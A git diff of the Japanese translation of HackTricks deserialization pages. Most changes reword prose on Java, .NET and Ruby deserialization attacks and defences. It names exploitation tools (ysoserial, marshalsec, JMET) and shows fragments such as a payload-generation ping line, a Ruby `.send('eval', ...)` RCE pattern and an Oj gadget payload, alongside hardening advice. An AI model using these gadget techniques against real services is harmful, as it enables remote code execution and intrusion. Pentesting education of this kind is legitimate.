-**java.lang.Runtime.exec()** のペイロードを作成する際、実行の出力をリダイレクトするために ">" や "|" のような **特殊文字** を使用することは **できません**。コマンドを実行するために "$()" を使用したり、**スペース** で区切られた **引数** をコマンドに渡すこともできません（`echo -n "hello world"` は可能ですが、`python2 -c 'print "Hello world"'` はできません）。ペイロードを正しくエンコードするために、[このウェブページ](http://www.jackson-t.ca/runtime-exec-payloads.html) を使用することができます。
+**java.lang.Runtime.exec()** のペイロードを作成する際、実行の出力をリダイレクトするために ">" や "|" のような **特殊文字** を使用することはできません。また、コマンドを実行するために "$()" を使用したり、**スペース** で区切られた **引数** をコマンドに渡すこともできません（`echo -n "hello world"` は可能ですが、`python2 -c 'print "Hello world"'` はできません）。ペイロードを正しくエンコードするために、[このウェブページ](http://www.jackson-t.ca/runtime-exec-payloads.html) を使用することができます。
 
 次のスクリプトを使用して、Windows と Linux の **すべての可能なコード実行** ペイロードを作成し、脆弱なウェブページでテストしてください：
 ```python
@@ -455,12 +455,12 @@ generate('Linux', 'ping -c 1 nix.REPLACE.server.local')
 ```
 #### serialkillerbypassgadgets
 
-あなたは **https://github.com/pwntester/SerialKillerBypassGadgetCollection** **をysoserialと一緒に使用して、より多くのエクスプロイトを作成することができます**。このツールに関する詳細は、ツールが発表された**トークのスライド**にあります: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1)
+あなたは **ysoserial** と一緒に [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **を使用して、より多くのエクスプロイトを作成することができます**。このツールに関する詳細は、ツールが発表された **トークのスライド** にあります: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1)
 
 #### marshalsec
 
-[**marshalsec** ](https://github.com/mbechler/marshalsec)は、Javaのさまざまな**Json**および**Yml**シリアル化ライブラリを悪用するためのペイロードを生成するために使用できます。\
-プロジェクトをコンパイルするために、私は`pom.xml`にこの**依存関係**を**追加**する必要がありました:
+[**marshalsec** ](https://github.com/mbechler/marshalsec)は、Javaのさまざまな **Json** および **Yml** シリアル化ライブラリを悪用するためのペイロードを生成するために使用できます。\
+プロジェクトをコンパイルするために、私は `pom.xml` にこの **依存関係** を **追加** する必要がありました:
 ```markup
 <dependency>
 <groupId>javax.activation</groupId>
@@ -482,7 +482,7 @@ mvn clean package -DskipTests
 ```
 #### FastJSON
 
-このJava JSONライブラリについての詳細はこちらをお読みください: [https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html](https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html)
+このJava JSONライブラリについての詳細はこちらを参照してください: [https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html](https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html)
 
 ### Labs
 
@@ -494,8 +494,8 @@ mvn clean package -DskipTests
 Javaはさまざまな目的で多くのシリアル化を使用します:
 
 - **HTTPリクエスト**: シリアル化は、パラメータ、ViewState、クッキーなどの管理に広く使用されています。
-- **RMI (リモートメソッド呼び出し)**: シリアル化に完全に依存するJava RMIプロトコルは、Javaアプリケーションにおけるリモート通信の基盤です。
-- **HTTP経由のRMI**: この方法は、すべてのオブジェクト通信にシリアル化を利用するJavaベースの厚いクライアントウェブアプリケーションによく使用されます。
+- **RMI (Remote Method Invocation)**: Java RMIプロトコルは、シリアル化に完全に依存しており、Javaアプリケーションにおけるリモート通信の基盤です。
+- **HTTP経由のRMI**: この方法は、Javaベースの厚いクライアントウェブアプリケーションによって一般的に使用され、すべてのオブジェクト通信にシリアル化を利用します。
 - **JMX (Java Management Extensions)**: JMXは、ネットワーク上でオブジェクトを送信するためにシリアル化を利用します。
 - **カスタムプロトコル**: Javaでは、標準的な慣行として生のJavaオブジェクトの送信が含まれ、今後のエクスプロイト例で示されます。
 
@@ -520,12 +520,12 @@ throw new java.io.IOException("Cannot be deserialized");
 ```
 #### **Javaにおけるデシリアライズセキュリティの強化**
 
-**`java.io.ObjectInputStream`のカスタマイズ**は、デシリアライズプロセスを保護するための実用的なアプローチです。この方法は、以下の場合に適しています。
+**`java.io.ObjectInputStream`のカスタマイズ**は、デシリアライズプロセスを保護するための実用的なアプローチです。この方法は、次の場合に適しています。
 
 - デシリアライズコードがあなたの管理下にある。
 - デシリアライズのために期待されるクラスが知られている。
 
-**`resolveClass()`**メソッドをオーバーライドして、許可されたクラスのみにデシリアライズを制限します。これにより、明示的に許可されたクラス以外のデシリアライズが防止されます。以下の例では、デシリアライズを`Bicycle`クラスのみに制限しています：
+**`resolveClass()`**メソッドをオーバーライドして、許可されたクラスのみにデシリアライズを制限します。これにより、明示的に許可されたクラス以外のデシリアライズが防止されます。以下の例では、デシリアライズを`Bicycle`クラスのみに制限しています。
 ```java
 // Code from https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
 public class LookAheadObjectInputStream extends ObjectInputStream {
@@ -554,9 +554,9 @@ return super.resolveClass(desc);
 
 [rO0 by Contrast Security](https://github.com/Contrast-Security-OSS/contrast-rO0)の例を確認してください。
 
-**シリアライゼーションフィルターの実装**: Java 9は**`ObjectInputFilter`**インターフェースを介してシリアライゼーションフィルターを導入し、デシリアライズされる前にシリアライズされたオブジェクトが満たすべき基準を指定するための強力なメカニズムを提供します。これらのフィルターは、グローバルにまたはストリームごとに適用でき、デシリアライズプロセスに対する詳細な制御を提供します。
+**シリアライゼーションフィルターの実装**: Java 9では、**`ObjectInputFilter`**インターフェースを介してシリアライゼーションフィルターが導入され、デシリアライズされる前にシリアライズされたオブジェクトが満たすべき基準を指定するための強力なメカニズムを提供します。これらのフィルターは、グローバルにまたはストリームごとに適用でき、デシリアライズプロセスに対する詳細な制御を提供します。
 
-シリアライゼーションフィルターを利用するには、すべてのデシリアライズ操作に適用されるグローバルフィルターを設定するか、特定のストリームのために動的に構成できます。例えば:
+シリアライゼーションフィルターを利用するには、すべてのデシリアライズ操作に適用されるグローバルフィルターを設定するか、特定のストリームに対して動的に構成できます。例えば:
 ```java
 ObjectInputFilter filter = info -> {
 if (info.depth() > MAX_DEPTH) return Status.REJECTED; // Limit object graph depth
@@ -572,7 +572,7 @@ ObjectInputFilter.Config.setSerialFilter(filter);
 
 - **NotSoSerial**は、信頼できないコードの実行を防ぐためにデシリアライズプロセスをインターセプトします。
 - **jdeserialize**は、シリアライズされたJavaオブジェクトをデシリアライズせずに分析することを可能にし、潜在的に悪意のあるコンテンツを特定するのに役立ちます。
-- **Kryo**は、スピードと効率を重視した代替シリアライゼーションフレームワークで、セキュリティを強化できる構成可能なシリアライゼーション戦略を提供します。
+- **Kryo**は、速度と効率を重視した代替シリアライゼーションフレームワークで、セキュリティを強化できる構成可能なシリアライゼーション戦略を提供します。
 
 ### 参考文献
 
@@ -610,12 +610,12 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 ### 悪用
 
-基本的に、**危険な方法でJMSを使用しているサービスが多数存在します**。したがって、これらのサービスにメッセージを送信するための**十分な権限**がある場合（通常は有効な資格情報が必要）、**デシリアライズされる悪意のあるシリアライズオブジェクトを送信できる可能性があります**。\
+基本的に、**危険な方法でJMSを使用しているサービスがたくさんあります**。したがって、これらのサービスにメッセージを送信するための**十分な権限**がある場合（通常は有効な資格情報が必要です）、**デシリアライズされる悪意のあるシリアライズオブジェクトを送信できる可能性があります**。\
 これは、この悪用において、**そのメッセージを使用するすべてのクライアントが感染する**ことを意味します。
 
 サービスが脆弱である場合（ユーザー入力を安全でない方法でデシリアライズしているため）、脆弱性を悪用するためには有効なガジェットを見つける必要があることを忘れないでください。
 
-ツール[JMET](https://github.com/matthiaskaiser/jmet)は、**既知のガジェットを使用して悪意のあるシリアライズオブジェクトを送信するためにこれらのサービスに接続して攻撃するために作成されました**。これらのエクスプロイトは、サービスがまだ脆弱であり、使用されるガジェットのいずれかが脆弱なアプリケーション内に存在する場合に機能します。
+ツール[JMET](https://github.com/matthiaskaiser/jmet)は、**既知のガジェットを使用して悪意のあるシリアライズオブジェクトを送信するためにこれらのサービスに接続して攻撃する**ために作成されました。これらのエクスプロイトは、サービスがまだ脆弱であり、使用されるガジェットのいずれかが脆弱なアプリケーション内に存在する場合に機能します。
 
 ### 参考文献
 
@@ -639,13 +639,13 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 #### ブラックボックス
 
-検索は、Base64エンコードされた文字列 **AAEAAAD/////** またはサーバー側でデシリアライズされる可能性のある類似のパターンを対象とする必要があります。これには、`TypeObject`や`$type`を含む**JSON**や**XML**構造が含まれる可能性がありますが、これに限定されません。
+検索は、Base64エンコードされた文字列**AAEAAAD/////**またはサーバー側でデシリアライズされる可能性のある類似のパターンをターゲットにする必要があります。これにより、デシリアライズされる型を制御できるようになります。これには、`TypeObject`や`$type`を含むがこれに限定されない**JSON**または**XML**構造が含まれる可能性があります。
 
 ### ysoserial.net
 
 この場合、ツール[**ysoserial.net**](https://github.com/pwntester/ysoserial.net)を使用して**デシリアライズの悪用を作成する**ことができます。gitリポジトリをダウンロードしたら、Visual Studioなどを使用して**ツールをコンパイル**する必要があります。
 
-**ysoserial.netがどのように悪用を作成するかを学びたい場合は、**[ObjectDataProviderガジェット + ExpandedWrapper + Json.Netフォーマッターが説明されているこのページを確認してください](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)。
+**ysoserial.netがどのように悪用を作成するか**について学びたい場合は、[**ObjectDataProviderガジェット + ExpandedWrapper + Json.Netフォーマッタについて説明されているこのページを確認してください**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)。
 
 **ysoserial.net**の主なオプションは、**`--gadget`**、**`--formatter`**、**`--output`**、および**`--plugin`**です。
 
@@ -656,9 +656,9 @@ jndi-java-naming-and-directory-interface-and-log4shell.md
 
 #### 追加のysoserial.netパラメータ
 
-- `--minify`は**小さなペイロード**を提供します（可能な場合）。
-- `--raf -f Json.Net -c "anything"`これは、提供されたフォーマッター（この場合は`Json.Net`）で使用できるすべてのガジェットを示します。
-- `--sf xml`は**ガジェットを示すことができます**（`-g`）そしてysoserial.netは「xml」を含むフォーマッターを検索します（大文字と小文字を区別しません）。
+- `--minify`は**小さいペイロード**を提供します（可能な場合）。
+- `--raf -f Json.Net -c "anything"`これは、提供されたフォーマッタ（この場合は`Json.Net`）で使用できるすべてのガジェットを示します。
+- `--sf xml`は**ガジェット**（`-g`）を示すことができ、ysoserial.netは「xml」を含むフォーマッタを検索します（大文字と小文字を区別しない）。
 
 **ysoserialの例**を使用して悪用を作成します：
 ```bash
@@ -694,7 +694,7 @@ Debugging.ShowErrors(inputArgs, err);
 }
 }
 ```
-これは、エクスプロイトをテストするために、コードが [serializersHelper.JsonNet_deserialize](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Helpers/SerializersHelper.cs#L539) を呼び出すことを意味します。
+これは、エクスプロイトをテストするためにコードが [serializersHelper.JsonNet_deserialize](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Helpers/SerializersHelper.cs#L539) を呼び出すことを意味します。
 ```java
 public static object JsonNet_deserialize(string str)
 {
@@ -710,34 +710,34 @@ return obj;
 
 ### ViewState
 
-[**.Netの\_\_ViewStateパラメータを悪用する方法についてのこのPOSTを見てください**](exploiting-__viewstate-parameter.md) **任意のコードを実行するために。** もしあなたが**被害者のマシンで使用されている秘密をすでに知っているなら、[**コードを実行する方法を知るためにこの投稿を読んでください**](exploiting-__viewstate-knowing-the-secret.md)**。**
+[**.Netの\_\_ViewStateパラメータをエクスプロイトする方法についてのこのPOSTを見てください**](exploiting-__viewstate-parameter.md) **任意のコードを実行するために。** もしあなたが**被害者のマシンで使用されている秘密をすでに知っているなら、[**コードを実行する方法を知るためにこの投稿を読んでください**](exploiting-__viewstate-knowing-the-secret.md)**。**
 
 ### Prevention
 
 .Netにおけるデシリアライズに関連するリスクを軽減するために：
 
-- **データストリームにオブジェクトタイプを定義させないようにします。** 可能な限り`DataContractSerializer`または`XmlSerializer`を利用してください。
+- **データストリームにオブジェクトタイプを定義させないようにします。** 可能な場合は`DataContractSerializer`または`XmlSerializer`を利用してください。
 - **`JSON.Net`の場合、`TypeNameHandling`を`None`に設定します：** %%%TypeNameHandling = TypeNameHandling.None%%%
 - **`JavaScriptSerializer`を`JavaScriptTypeResolver`と一緒に使用しないでください。**
 - **デシリアライズ可能なタイプを制限し、`System.IO.FileInfo`のような.Netタイプに内在するリスクを理解します。これはサーバーファイルのプロパティを変更し、サービス拒否攻撃を引き起こす可能性があります。**
 - **リスクのあるプロパティを持つタイプに注意してください。** 例えば、`System.ComponentModel.DataAnnotations.ValidationException`の`Value`プロパティは悪用される可能性があります。
 - **攻撃者がデシリアライズプロセスに影響を与えないように、タイプのインスタンス化を安全に制御します。これにより、`DataContractSerializer`や`XmlSerializer`でさえ脆弱になります。**
-- **`BinaryFormatter`および`JSON.Net`のためにカスタム`SerializationBinder`を使用してホワイトリスト制御を実装します。**
+- **`BinaryFormatter`と`JSON.Net`のためにカスタム`SerializationBinder`を使用してホワイトリスト制御を実装します。**
 - **.Net内の既知の不安全なデシリアライズガジェットについて情報を得て、デシリアライザがそのようなタイプをインスタンス化しないようにします。**
 - **インターネットアクセスのあるコードから潜在的にリスクのあるコードを隔離し、WPFアプリケーションの`System.Windows.Data.ObjectDataProvider`のような既知のガジェットを信頼できないデータソースにさらさないようにします。**
 
 ### **References**
 
-- Javaと.NetのJSONデシリアライズに関する**論文：** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**、** トーク： [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) およびスライド： [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+- Javaと.NetのJSONデシリアライズに関する**論文：** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**、**トーク： [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) とスライド： [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
 - [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp)
 - [https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
 - [https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization](https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization)
 
 ## **Ruby**
 
-Rubyでは、シリアライズは**marshal**ライブラリ内の2つのメソッドによって実現されます。最初のメソッドは**dump**として知られ、オブジェクトをバイトストリームに変換するために使用されます。このプロセスはシリアライズと呼ばれます。逆に、2番目のメソッド**load**は、バイトストリームをオブジェクトに戻すために使用され、このプロセスはデシリアライズと呼ばれます。
+Rubyでは、シリアル化は**marshal**ライブラリ内の2つのメソッドによって行われます。最初のメソッドは**dump**と呼ばれ、オブジェクトをバイトストリームに変換するために使用されます。このプロセスはシリアル化と呼ばれます。逆に、2番目のメソッド**load**は、バイトストリームをオブジェクトに戻すために使用され、このプロセスはデシリアライズと呼ばれます。
 
-シリアライズされたオブジェクトを保護するために、**RubyはHMAC（Hash-Based Message Authentication Code）**を使用し、データの整合性と真正性を確保します。この目的のために使用されるキーは、いくつかの可能な場所のいずれかに保存されます：
+シリアル化されたオブジェクトを保護するために、**RubyはHMAC（Hash-Based Message Authentication Code）を使用して**データの整合性と真正性を確保します。この目的のために使用されるキーは、いくつかの可能な場所のいずれかに保存されます：
 
 - `config/environment.rb`
 - `config/initializers/secret_token.rb`
@@ -819,13 +819,13 @@ puts Base64.encode64(payload)
 
 ### Ruby .send() メソッド
 
-[**この脆弱性レポート**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/)で説明されているように、ユーザーのサニタイズされていない入力がrubyオブジェクトの`.send()`メソッドに到達すると、このメソッドはオブジェクトの**任意の他のメソッド**を任意のパラメータで呼び出すことを許可します。
+[**この脆弱性レポート**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/)で説明されているように、ユーザーの未サニタイズ入力がrubyオブジェクトの`.send()`メソッドに到達すると、このメソッドはオブジェクトの**任意の他のメソッドを**任意のパラメータで呼び出すことを許可します。
 
-例えば、evalを呼び出し、次にrubyコードを第二のパラメータとして渡すことで、任意のコードを実行することができます:
+例えば、evalを呼び出し、次にrubyコードを第二パラメータとして渡すことで、任意のコードを実行することができます:
 ```ruby
 <Object>.send('eval', '<user input with Ruby code>') == RCE
 ```
-さらに、**`.send()`** のパラメータが攻撃者によって制御されている場合、前述の説明のように、**引数を必要としない**か、**デフォルト値を持つ**引数を持つオブジェクトの任意のメソッドを呼び出すことが可能です。\
+さらに、**`.send()`** のパラメータが攻撃者によって制御されている場合、前の記述で述べたように、**引数を必要としない**か、**デフォルト値**を持つ引数を持つオブジェクトの任意のメソッドを呼び出すことが可能です。\
 これを行うために、オブジェクトのすべてのメソッドを列挙して、**その要件を満たす興味深いメソッドを見つける**ことができます。
 ```ruby
 <Object>.send('<user_input>')
@@ -854,15 +854,15 @@ candidate_methods.length() # Final number of methods=> 3595
 
 ### Ruby _json汚染
 
-ボディに配列のようなハッシュ化できない値を送信すると、それらは新しいキー`_json`に追加されます。しかし、攻撃者はボディに任意の値を持つ`_json`という値を設定することも可能です。例えば、バックエンドがパラメータの真偽をチェックし、その後`_json`パラメータを使用して何らかのアクションを実行する場合、認証バイパスが行われる可能性があります。
+ボディに配列のようなハッシュ化できない値を送信すると、それらは`_json`という新しいキーに追加されます。しかし、攻撃者はボディに任意の値を持つ`_json`という値を設定することも可能です。例えば、バックエンドがパラメータの真偽をチェックし、その後`_json`パラメータを使用して何らかのアクションを実行する場合、認証バイパスが行われる可能性があります。
 
-[Ruby _json汚染ページで詳細を確認してください](ruby-_json-pollution.md)。
+[Ruby _json汚染ページで詳細情報を確認してください](ruby-_json-pollution.md)。
 
 ### その他のライブラリ
 
 この技術は[**このブログ投稿から**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared)取得されました。
 
-オブジェクトをシリアライズするために使用できる他のRubyライブラリがあり、これらは不安全なデシリアライズ中にRCEを得るために悪用される可能性があります。以下の表は、これらのライブラリのいくつかと、それがデシリアライズされる際に呼び出されるメソッドを示しています（基本的にRCEを得るために悪用する関数）：
+オブジェクトをシリアライズするために使用できる他のRubyライブラリがあり、それらは不安全なデシリアライズ中にRCEを得るために悪用される可能性があります。以下の表は、これらのライブラリのいくつかと、それがデシリアライズされる際に呼び出されるメソッドを示しています（基本的にRCEを得るために悪用する関数）：
 
 <table data-header-hidden><thead><tr><th width="179"></th><th width="146"></th><th></th></tr></thead><tbody><tr><td><strong>ライブラリ</strong></td><td><strong>入力データ</strong></td><td><strong>クラス内のキックオフメソッド</strong></td></tr><tr><td>Marshal (Ruby)</td><td>バイナリ</td><td><code>_load</code></td></tr><tr><td>Oj</td><td>JSON</td><td><code>hash</code> (クラスはハッシュ（マップ）のキーとして配置する必要があります)</td></tr><tr><td>Ox</td><td>XML</td><td><code>hash</code> (クラスはハッシュ（マップ）のキーとして配置する必要があります)</td></tr><tr><td>Psych (Ruby)</td><td>YAML</td><td><code>hash</code> (クラスはハッシュ（マップ）のキーとして配置する必要があります)<br><code>init_with</code></td></tr><tr><td>JSON (Ruby)</td><td>JSON</td><td><code>json_create</code> ([json_createに関するノートを参照](#table-vulnerable-sinks))</td></tr></tbody></table>
 
@@ -888,7 +888,7 @@ puts json_payload
 # Sink vulnerable inside the code accepting user input as json_payload
 Oj.load(json_payload)
 ```
-Ojを悪用しようとした場合、`hash`関数内で`to_s`を呼び出すガジェットクラスを見つけることができました。これにより、specが呼び出され、fetch_pathが呼び出され、ランダムなURLを取得することが可能になり、これらの非サニタイズされたデシリアライズ脆弱性の優れた検出器を提供しました。
+Ojを悪用しようとした場合、`hash`関数内で`to_s`を呼び出すガジェットクラスを見つけることができました。これにより、specが呼び出され、fetch_pathが呼び出され、ランダムなURLを取得することが可能になり、これらの未サニタイズのデシリアライズ脆弱性の優れた検出器を提供しました。
 ```json
 {
 "^o": "URI::HTTP",
diff --git a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
index 1ecf2ee8f..58a7d772a 100644
--- a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
+++ b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-この投稿は、**ObjectDataProvider ガジェットがどのように悪用されるかを理解すること**と、**Json.Net および xmlSerializer のシリアライゼーションライブラリがそのガジェットでどのように悪用されるか**に捧げられています。
+この投稿は、**ガジェット ObjectDataProvider がどのように悪用されるかを理解すること**と、**Json.Net および xmlSerializer のシリアル化ライブラリがそのガジェットとどのように悪用されるか**に捧げられています。
 
 ## ObjectDataProvider ガジェット
 
@@ -18,11 +18,11 @@
 
 ![](<../../images/image (427).png>)
 
-`MethodName` が設定されると `base.Refresh()` が呼び出されるのが観察できます。これが何をするのか見てみましょう:
+`MethodName` が設定されると `base.Refresh()` が呼び出されることがわかります。これが何をするのか見てみましょう:
 
 ![](<../../images/image (319).png>)
 
-では、`this.BeginQuery()` が何をするのかを見続けましょう。`BeginQuery` は `ObjectDataProvider` によってオーバーライドされており、これがその動作です:
+では、`this.BeginQuery()` が何をするのかを見てみましょう。`BeginQuery` は `ObjectDataProvider` によってオーバーライドされており、これがその動作です:
 
 ![](<../../images/image (345).png>)
 
@@ -30,7 +30,7 @@
 
 ![](<../../images/image (596).png>)
 
-これは `QueryWorker` 関数の完全なコードではありませんが、その興味深い部分を示しています: コードは **`this.InvokeMethodOnInstance(out ex);`** を呼び出します。これは **メソッドセットが呼び出される**行です。
+これは `QueryWorker` 関数の完全なコードではありませんが、興味深い部分を示しています: コードは **`this.InvokeMethodOnInstance(out ex);`** を呼び出します。これは **メソッドセットが呼び出される**行です。
 
 _**MethodName**_ を設定するだけでそれが実行されることを確認したい場合は、このコードを実行できます:
 ```java
@@ -52,14 +52,14 @@ myODP.MethodName = "Start";
 }
 }
 ```
-注意：`System.Windows.Data`をロードするには、_C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ を参照として追加する必要があります。
+注意：`System.Windows.Data`をロードするには、_C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_を参照として追加する必要があります。
 
 ## ExpandedWrapper
 
 前述のエクスプロイトを使用すると、**オブジェクト**が_**ObjectDataProvider**_インスタンスとして**デシリアライズされる**ケースがあります（例えば、DotNetNukeの脆弱性では、XmlSerializerを使用してオブジェクトが`GetType`を使用してデシリアライズされました）。そのため、_ObjectDataProvider_インスタンスにラップされているオブジェクトの型については**知識がありません**（例えば`Process`）。DotNetNukeの脆弱性についての詳細は[こちら](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1)で確認できます。
 
 このクラスは、特定のインスタンスにカプセル化されたオブジェクトのオブジェクト型を**指定する**ことを可能にします。したがって、このクラスはソースオブジェクト（_ObjectDataProvider_）を新しいオブジェクト型にカプセル化し、必要なプロパティ（_ObjectDataProvider.MethodName_および_ObjectDataProvider.MethodParameters_）を提供するために使用できます。\
-これは、前述のケースのように非常に便利です。なぜなら、**_ObjectDataProvider**_\*\*を\*\*_**ExpandedWrapper** \_インスタンス内に**ラップ**でき、**デシリアライズされると**このクラスは**_**OjectDataProvider**_オブジェクトを**作成**し、_**MethodName**_で示された**関数**を**実行**します。
+これは、前述のケースのように非常に便利です。なぜなら、**_ObjectDataProvider**_\*\*を\*\*_**ExpandedWrapper** \_インスタンス内に**ラップ**でき、**デシリアライズされると**このクラスは_**OjectDataProvider**_オブジェクトを**作成**し、_**MethodName**_で示された**関数**を**実行**します。
 
 次のコードでこのラッパーを確認できます：
 ```java
diff --git a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
index f79a86605..69769be2b 100644
--- a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
+++ b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
@@ -4,7 +4,7 @@
 
 # Serializable
 
-Javaの`Serializable`インターフェース（`java.io.Serializable`は、**シリアライズ**および**デシリアライズ**を行うクラスが実装しなければならないマーカーインターフェースです。Javaオブジェクトのシリアライズ（書き込み）は[ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html)で行われ、デシリアライズ（読み込み）は[ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html)で行われます。
+Javaの`Serializable`インターフェース（`java.io.Serializable`は、**シリアライズ**および**デシリアライズ**を行うクラスが実装しなければならないマーカーインターフェースです。Javaオブジェクトのシリアライズ（書き込み）は[ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html)を使用して行われ、デシリアライズ（読み込み）は[ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html)を使用して行われます。
 
 **シリアライズ可能な**クラス**Person**の例を見てみましょう。このクラスは**readObject**関数を**オーバーライド**しているため、この**クラス**の**任意のオブジェクト**が**デシリアライズ**されると、この**関数**が**実行**されます。\
 この例では、クラスPersonの**readObject関数**が彼のペットの`eat()`関数を呼び出し、犬の`eat()`関数が（何らかの理由で）**calc.exe**を呼び出します。**この計算機を実行するために、Personオブジェクトをシリアライズおよびデシリアライズする方法を見ていきましょう：**
@@ -82,6 +82,6 @@ payloadTest("test.ser");
 ```
 ## 結論
 
-この非常に基本的な例からわかるように、ここでの「脆弱性」は、**readObject** 関数が **他の脆弱な関数を呼び出している** ために発生します。
+この非常に基本的な例からわかるように、ここでの「脆弱性」は**readObject**関数が**他の脆弱な関数を呼び出している**ために発生します。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
index ec8e13258..d3103e5a6 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
@@ -1,5 +1,5 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**次の素晴らしい投稿をチェックしてください** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
+**素晴らしい投稿をチェックしてください** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 0c3bc9ae1..15ee93606 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -22,7 +22,7 @@ ViewState情報は、以下の特性またはその組み合わせによって
 1. **任意の.NETバージョン**の場合、MACと暗号化の両方が無効な場合、MachineKeyは必要なく、したがってそれを特定する適用可能な方法はありません。
 2. **4.5未満のバージョン**の場合、MACが有効で暗号化が無効な場合、MachineKeyが必要です。MachineKeyを特定する方法は「Blacklist3r」と呼ばれます。
 3. **4.5未満のバージョン**の場合、MACが有効か無効かにかかわらず、暗号化が有効な場合、MachineKeyが必要です。MachineKeyを特定するのは「Blacklist3r - 将来の開発」のタスクです。
-4. **4.5以上のバージョン**の場合、MACと暗号化のすべての組み合わせ（両方がtrueであるか、一方がtrueで他方がfalseであるか）はMachineKeyを必要とします。MachineKeyは「Blacklist3r」を使用して特定できます。
